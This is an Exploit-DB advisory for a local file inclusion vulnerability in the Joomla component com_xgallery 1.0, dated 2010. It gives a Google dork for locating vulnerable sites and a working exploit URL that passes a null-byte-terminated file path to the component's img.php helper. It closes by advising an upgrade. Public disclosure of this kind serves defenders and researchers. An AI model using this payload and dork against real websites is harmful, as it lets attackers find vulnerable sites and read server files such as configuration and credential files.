Joomla! Component com_xgallery 1.0 - Local File Inclusion

EDB-ID:

15801

CVE:

N/A


Author:

KelvinX

Type:

webapps


Platform:

PHP

Date:

2010-12-21


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# Exploit Title: Joomla Component com_xgallery 1.0 Local File Inclusion Vulnerability
# Author: KelvinX (kelvinxgr@gmail.com)
# Websites: http://xgroup.vn, http://kelvinx.net, http://facebook.com/kelvinxgr
# Date: December, 21-2010
# Location: HCM City, Vietnam

 ------------------------

# Application: com_xgallery
# Version: 1.0
# Vendor: http://www.optikool.com/documentation/xmovie-component
# Google Dorks: inurl:com_xgallery

------------------------

Exploit: http://127.0.0.1/[path]/components/com_xgallery/helpers/img.php?file=[LFI]%00

------------------------

# Solution: Upgrade to the most recent version